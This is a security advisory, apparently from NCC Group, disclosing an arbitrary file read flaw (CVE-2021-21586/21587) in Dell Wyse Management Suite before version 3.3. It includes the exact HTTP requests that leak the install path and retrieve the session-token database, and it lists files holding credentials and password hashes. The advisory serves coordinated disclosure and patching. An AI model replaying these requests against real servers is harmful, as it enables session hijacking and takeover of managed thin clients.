Vendor: Dell
Vendor URL: https://www.dell.com/support/home/en-us/product-support/product/wyse-wms/drivers 
Versions affected: Prior to version 3.3
Systems Affected: Any
Author: Stephen Tomkinson [email protected]
Advisory URL / CVE Identifier: CVE-2021-21586, CVE-2021-21587
Risk: High – can lead to compromise of administrative sessions

Summary

Thin clients are often found in secure environments as their diskless operation reduces physical security risks. Wyse Management Suite (WMS) acts a central hub for Dell’s thin client hardware, providing centralised provisioning and configuration. The Wyse Management Suite web interface and the configuration services used by the Thin Clients on boot are part of the same web application it is therefore one of the few services which must be exposed to the edge network connections even in secure environments.

On affected versions of WMS, it is possible to retrieve arbitrary files from the server, including database credentials and database files containing the session data of administrative users.

Location

The /ccm-web/image/os endpoint accepted a filePath and fileName parameter which would retrieve files from anywhere on the operating system, e.g. GET /ccm-web/image/os filePath=c:\windows\&fileName=win.ini


Exploitation was aided by a second endpoint which revealed the path the product was installed to via a verbose error message. This could be trigger with PUT /ccm-web/image/pull/a/b

Impact

An attacker with physical access to a thin client and its network connection can exploit this vulnerability to gain access to the management interface of the whole thin client estate. The management interface includes features such as resetting BIOS passwords and remotely shadowing terminal screens via VNC.

Details

Access to the vulnerable endpoint was authenticated with a Wyse device ID. This ID can be retrieved from a configured Wyse thin client using a man-in-the-middle attack. As the WMS is used to provision TLS certificates, communication between a thin client and the WMS is often performed over TLS but without verification of the server certificate. This can be forced by a DNS or DHCP setting retrieved by the thin client early in the boot process.

With a valid device ID, a request to the vulnerable endpoints can be made, first to obtain the installation path of the software:

PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

Which resulted in the following error, revealing the internal path:

HTTP/1.1 500 
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4443165646FDA1BA417D08917BFD17C7; Path=/ccm-web; Secure; HttpOnly
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 107
Date: Fri, 16 Apr 2021 10:51:51 GMT
Connection: close

E:\Program Files\DELL\Software\repository\imagePull\staging\a\b (The system cannot find the path specified)

Then to the vulnerable endpoint to retrieve files:

GET /ccm-web/image/os?filePath=E:\Program Files\DELL\WMS\Database\SQL\stratus&fileName= persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

Resulting in retrieval of the embedded MySQL database table that held the session tokens for authenticated users of the WMS. Extracting the JSESSIONID cookie value from this table permitted session hijacking.

Additional files of interest to an attacker include:

PathContains
{install_path}\Tomcat-9\webapps\ccm-web\WEB-INF\classes\bootstrap.properties Database credentials encrypted with a fixed key
{install_path}\Database\SQL\stratus\person.ibdPasswords for WMS administrative users, hashed as SHA256(MD5(pass),salt)

Recommendation

Update to version 3.3 of Wyse Management Suite.

Vendor Communication

NCC Group Notifies Vendor: 7th May 2021
Vendor Replies Requesting More Details: 11th May 2021
NCC Group Sends Requested information: 11th May 2021
Vendor Confirms The Vulnerability: 20th May 2021
NCC Group Requests a Patch Date: 18th June 2021
Vendor Response With Date: 18th June 2021
Patch & Advisory Published: July 6th 2021

Thanks to

Dave Cash at NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  6th July 2021

Written by:  Stephen Tomkinson